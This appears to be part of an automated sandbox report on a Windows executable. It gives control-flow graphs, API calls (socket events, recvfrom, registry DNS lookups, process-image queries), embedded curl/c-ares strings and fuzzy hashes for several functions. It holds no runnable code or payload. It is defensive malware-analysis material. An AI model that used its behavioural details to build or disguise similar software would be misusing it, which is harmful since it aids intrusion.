                                                control_flow_graph 1272 3c29ff-3c2a2f FindFirstFileA 1273 3c2a38 1272->1273 1274 3c2a31-3c2a36 1272->1274 1275 3c2a3d-3c2a91 call 849c50 call 849ce0 RegOpenKeyExA 1273->1275 1274->1275 1280 3c2a9a 1275->1280 1281 3c2a93-3c2a98 1275->1281 1282 3c2a9f-3c2b0c call 849c50 call 849ce0 CharUpperA call 748da0 1280->1282 1281->1282 1290 3c2b0e-3c2b13 1282->1290 1291 3c2b15 1282->1291 1292 3c2b1a-3c2b92 call 849c50 call 849ce0 call 748e80 call 748e70 1290->1292 1291->1292 1301 3c2bcc-3c2c66 QueryFullProcessImageNameA CloseHandle call 748da0 1292->1301 1302 3c2b94-3c2ba3 1292->1302 1312 3c2c6f 1301->1312 1313 3c2c68-3c2c6d 1301->1313 1305 3c2ba5-3c2bae 1302->1305 1306 3c2bb0-3c2bca call 748e68 1302->1306 1305->1301 1306->1301 1306->1302 1314 3c2c74-3c2ce9 call 849c50 call 849ce0 call 748e80 call 748e70 1312->1314 1313->1314 1323 3c2dcf-3c2e1c call 849c50 call 849ce0 CloseHandle 1314->1323 1324 3c2cef-3c2d49 call 748bb0 call 748da0 1314->1324 1333 3c2e23-3c2e2e 1323->1333 1337 3c2d99-3c2dad 1324->1337 1338 3c2d4b-3c2d63 call 748da0 1324->1338 1335 3c2e37 1333->1335 1336 3c2e30-3c2e35 1333->1336 1339 3c2e3c-3c2ed6 call 849c50 call 849ce0 1335->1339 1336->1339 1337->1323 1338->1337 1344 3c2d65-3c2d7d call 748da0 1338->1344 1354 3c2ed8-3c2ee1 1339->1354 1355 3c2eea 1339->1355 1344->1337 1350 3c2d7f-3c2d97 call 748da0 1344->1350 1350->1337 1356 3c2daf-3c2dc9 call 748e68 1350->1356 1354->1355 1357 3c2ee3-3c2ee8 1354->1357 1358 3c2eef-3c2f16 call 849c50 call 849ce0 1355->1358 1356->1323 1356->1324 1357->1358
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                • String ID: 0
                                                • API String ID: 2406880114-4108050209
                                                • Opcode ID: 4f45222cfff1af0aec7f6737cd0a1f47915e4cd230eee643e4f24290f260fe45
                                                • Instruction ID: d22103d65b1631c24ae3c76e24aa7ca088f9c3382c6e73cc873f399cc8840575
                                                • Opcode Fuzzy Hash: 4f45222cfff1af0aec7f6737cd0a1f47915e4cd230eee643e4f24290f260fe45
                                                • Instruction Fuzzy Hash: B9E1E5B4909319DFCB50EF68D985A9EBBF4EF48344F018869E898D7350EB749984CF42
                                                Function 003D05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1512 3d05b0-3d05b7 1513 3d05bd-3d05d4 1512->1513 1514 3d07ee 1512->1514 1515 3d05da-3d05e6 1513->1515 1516 3d07e7-3d07ed 1513->1516 1515->1516 1517 3d05ec-3d05f0 1515->1517 1516->1514 1518 3d07c7-3d07cc 1517->1518 1519 3d05f6-3d0620 call 3d7350 call 3c70b0 1517->1519 1518->1516 1524 3d066a-3d068c call 3fdec0 1519->1524 1525 3d0622-3d0624 1519->1525 1530 3d07d6-3d07e3 call 3d7380 1524->1530 1531 3d0692-3d06a0 1524->1531 1527 3d0630-3d0655 call 3c70d0 call 3d03c0 call 3d7450 1525->1527 1556 3d07ce 1527->1556 1557 3d065b-3d0668 call 3c70e0 1527->1557 1530->1516 1533 3d06f4-3d06f6 1531->1533 1534 3d06a2-3d06a4 1531->1534 1539 3d06fc-3d06fe 1533->1539 1540 3d07ef-3d082b call 3d3000 1533->1540 1537 3d06b0-3d06e4 call 3d73b0 1534->1537 1537->1530 1555 3d06ea-3d06ee 1537->1555 1545 3d072c-3d0754 1539->1545 1553 3d0a2f-3d0a35 1540->1553 1554 3d0831-3d0837 1540->1554 1546 3d075f-3d078b 1545->1546 1547 3d0756-3d075b 1545->1547 1567 3d0791-3d0796 1546->1567 1568 3d0700-3d0703 1546->1568 1551 3d075d 1547->1551 1552 3d0707-3d0719 WSAEventSelect 1547->1552 1558 3d0723-3d0726 1551->1558 1552->1530 1565 3d071f 1552->1565 1563 3d0a3c-3d0a52 1553->1563 1564 3d0a37-3d0a3a 1553->1564 1560 3d0839-3d0842 call 3d6fa0 1554->1560 1561 3d0861-3d087e 1554->1561 1555->1537 1562 3d06f0 1555->1562 1556->1530 1557->1524 1557->1527 1558->1540 1558->1545 1573 3d0847-3d084c 1560->1573 1580 3d0882-3d088d 1561->1580 1562->1533 1563->1530 1570 3d0a58-3d0a81 call 3d2f10 1563->1570 1564->1563 1565->1558 1567->1568 1572 3d079c-3d07c2 call 3c76a0 1567->1572 1568->1552 1570->1530 1581 3d0a87-3d0a97 call 3d6df0 1570->1581 1572->1568 1578 3d0a9c-3d0aa4 1573->1578 1579 3d0852 1573->1579 1578->1530 1579->1561 1583 3d0854-3d085f 1579->1583 1584 3d0970-3d0975 1580->1584 1585 3d0893-3d08b1 1580->1585 1581->1530 1583->1580 1587 3d0a19-3d0a2c 1584->1587 1588 3d097b-3d0989 call 3c70b0 1584->1588 1589 3d08c8-3d08f7 1585->1589 1587->1553 1588->1587 1597 3d098f-3d099e 1588->1597 1595 3d08fd-3d0925 1589->1595 1596 3d08f9-3d08fb 1589->1596 1598 3d0928-3d093f 1595->1598 1596->1598 1599 3d09b0-3d09c1 call 3c70d0 1597->1599 1605 3d0945-3d096b 1598->1605 1606 3d08b3-3d08c2 1598->1606 1603 3d09a0-3d09ae call 3c70e0 1599->1603 1604 3d09c3-3d09c7 1599->1604 1603->1587 1603->1599 1607 3d09e8-3d0a03 WSAEnumNetworkEvents 1604->1607 1605->1606 1606->1584 1606->1589 1610 3d0a05-3d0a17 1607->1610 1611 3d09d0-3d09e6 WSAEventSelect 1607->1611 1610->1611 1611->1603 1611->1607
                                                APIs
                                                • WSAEventSelect.WS2_32(?,?,?), ref: 003D0711
                                                • WSAEventSelect.WS2_32(?,?,00000000), ref: 003D09DD
                                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 003D09FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: EventSelect$EnumEventsNetwork
                                                • String ID: N=<$multi.c
                                                • API String ID: 2170980988-1445331030
                                                • Opcode ID: d7ea64729ae74ac0c02c0dcc9b76d57715928f06af8af8079201113c8ddd454b
                                                • Instruction ID: ac8969ccb393a20f57a900e7261b84ab9c2d71956c225a9c08df394f5e4a5d1c
                                                • Opcode Fuzzy Hash: d7ea64729ae74ac0c02c0dcc9b76d57715928f06af8af8079201113c8ddd454b
                                                • Instruction Fuzzy Hash: 41D1DF726083019FE716CF20E881B6F77E9FF94B08F05482EF8948A251E774E958DB52
                                                Function 0048B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1683 48b180-48b195 1684 48b19b-48b1a2 1683->1684 1685 48b3e0-48b3e7 1683->1685 1686 48b1b0-48b1b9 1684->1686 1686->1686 1687 48b1bb-48b1bd 1686->1687 1687->1685 1688 48b1c3-48b1d0 1687->1688 1690 48b3db 1688->1690 1691 48b1d6-48b1f2 1688->1691 1690->1685 1692 48b229-48b22d 1691->1692 1693 48b3e8-48b417 1692->1693 1694 48b233-48b246 1692->1694 1702 48b41d-48b429 1693->1702 1703 48b582-48b589 1693->1703 1695 48b248-48b24b 1694->1695 1696 48b260-48b264 1694->1696 1697 48b24d-48b256 1695->1697 1698 48b215-48b223 1695->1698 1700 48b269-48b286 call 48af30 1696->1700 1697->1700 1698->1692 1701 48b315-48b33c call 748b00 1698->1701 1710 48b288-48b2a3 call 48b060 1700->1710 1711 48b2f0-48b301 1700->1711 1717 48b3bf-48b3ca 1701->1717 1718 48b342-48b347 1701->1718 1707 48b42b-48b433 call 48b590 1702->1707 1708 48b435-48b44c call 48b590 1702->1708 1707->1708 1722 48b458-48b471 call 48b590 1708->1722 1723 48b44e-48b456 call 48b590 1708->1723 1728 48b2a9-48b2c7 getsockname call 48b020 1710->1728 1729 48b200-48b213 call 48b020 1710->1729 1711->1698 1732 48b307-48b310 1711->1732 1724 48b3cc-48b3d9 1717->1724 1719 48b349-48b358 1718->1719 1720 48b384-48b38f 1718->1720 1726 48b360-48b382 1719->1726 1720->1717 1727 48b391-48b3a5 1720->1727 1741 48b48c-48b4a7 1722->1741 1742 48b473-48b487 1722->1742 1723->1722 1724->1685 1726->1720 1726->1726 1733 48b3b0-48b3bd 1727->1733 1739 48b2cc-48b2dd 1728->1739 1729->1698 1732->1724 1733->1717 1733->1733 1739->1698 1743 48b2e3 1739->1743 1744 48b4a9-48b4b1 call 48b660 1741->1744 1745 48b4b3-48b4cb call 48b660 1741->1745 1742->1703 1743->1732 1744->1745 1750 48b4d9-48b4f5 call 48b660 1745->1750 1751 48b4cd-48b4d5 call 48b660 1745->1751 1756 48b50d-48b52b call 48b770 * 2 1750->1756 1757 48b4f7-48b50b 1750->1757 1751->1750 1756->1703 1762 48b52d-48b531 1756->1762 1757->1703 1763 48b580 1762->1763 1764 48b533-48b53b 1762->1764 1763->1703 1765 48b578-48b57e 1764->1765 1766 48b53d-48b547 1764->1766 1765->1703 1766->1765 1767 48b549-48b54d 1766->1767 1767->1765 1768 48b54f-48b558 1767->1768 1768->1765 1769 48b55a-48b576 call 48b870 * 2 1768->1769 1769->1703 1769->1765
                                                APIs
                                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 0048B2B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                                • API String ID: 3358416759-2430778319
                                                • Opcode ID: fc5871a87578e14347d0eec0025631f267a78a5fc7dbb7546ff5a41353fc38e6
                                                • Instruction ID: 7218e5eb916dfabc612c07df9d7b26b0df4301b45008727cd98c1d0c295d54bd
                                                • Opcode Fuzzy Hash: fc5871a87578e14347d0eec0025631f267a78a5fc7dbb7546ff5a41353fc38e6
                                                • Instruction Fuzzy Hash: F2C16C316043059FD718EF24C885A6E77E1EF89318F04896EE8899B3A2D738ED45CBC5
                                                Function 003D6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9972bd78324e8761e382e353888ff52e2990b5baa0f9380c79e69b56cf72228
                                                • Instruction ID: 66af9803ff3ed55fe157029ba32f8f7e7f64b30730ed6155853a4a06eee4afaf
                                                • Opcode Fuzzy Hash: b9972bd78324e8761e382e353888ff52e2990b5baa0f9380c79e69b56cf72228
                                                • Instruction Fuzzy Hash: A991053260D3454BD7378A28E8847BBB2D9EFC4364F168B2EE899432D4F7759D40D681
                                                Function 0048A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0047712E,?,?,?,00001001,00000000), ref: 0048A90D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: recvfrom
                                                • String ID:
                                                • API String ID: 846543921-0
                                                • Opcode ID: 02b8fda3d4e9fea08ae8b6f830c628c95bca5ce2a1e129376a79cd1902cd776b
                                                • Instruction ID: 25829fb0812bbf01cbc404084ef3a683f16248663b4acb6dd66be20131ca734d
                                                • Opcode Fuzzy Hash: 02b8fda3d4e9fea08ae8b6f830c628c95bca5ce2a1e129376a79cd1902cd776b
                                                • Instruction Fuzzy Hash: EEF01DB5118348AFE210AE41DC48D6BBBEDEFC9754F05496EF95C133119271AE11CBB2
                                                Function 0047A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0047AA19
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0047AA4C
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0047AA97
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0047AAE9
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0047AB30
                                                • RegCloseKey.KERNELBASE(?), ref: 0047AB6A
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0047AB82
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0047AC46
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0047AD0A
                                                • RegEnumKeyExA.KERNELBASE ref: 0047AD8D
                                                • RegCloseKey.KERNELBASE(?), ref: 0047ADD9
                                                • RegEnumKeyExA.KERNELBASE ref: 0047AE08
                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0047AE2A
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0047AE54
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0047AF63
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0047AFB2
                                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0047B072
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: QueryValue$Open$CloseEnum
                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                • API String ID: 4217438148-1047472027
                                                • Opcode ID: 7e8cb7e3fe990a163c08e5676af2359a7924a81030694b2a5a5efadf1f314815
                                                • Instruction ID: 3b2688fd1d2b028a13f7becc1e3040477f32c82496a715a26397e355ea79a9ce
                                                • Opcode Fuzzy Hash: 7e8cb7e3fe990a163c08e5676af2359a7924a81030694b2a5a5efadf1f314815
                                                • Instruction Fuzzy Hash: DD72B1B1608301AFE320DB24CC81B9F77E8EF85744F148829F949972A1E778E955CB97
                                                Function 003FA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                Download Yara Rule
                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 003FA832
                                                Strings
                                                • bind failed with errno %d: %s, xrefs: 003FB080
                                                • Bind to local port %d failed, trying next, xrefs: 003FAFE5
                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 003FA6CE
                                                • @, xrefs: 003FA8F4
                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 003FAD0A
                                                • Trying %s:%d..., xrefs: 003FA7C2, 003FA7DE
                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 003FADAC
                                                • Could not set TCP_NODELAY: %s, xrefs: 003FA871
                                                • @, xrefs: 003FAC42
                                                • Local Interface %s is ip %s using address family %i, xrefs: 003FAE60
                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 003FAE1F
                                                • cf-socket.c, xrefs: 003FA5CD, 003FA735
                                                • Trying [%s]:%d..., xrefs: 003FA689
                                                • cf_socket_open() -> %d, fd=%d, xrefs: 003FA796
                                                • Local port: %hu, xrefs: 003FAF28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                • API String ID: 3981526788-2373386790
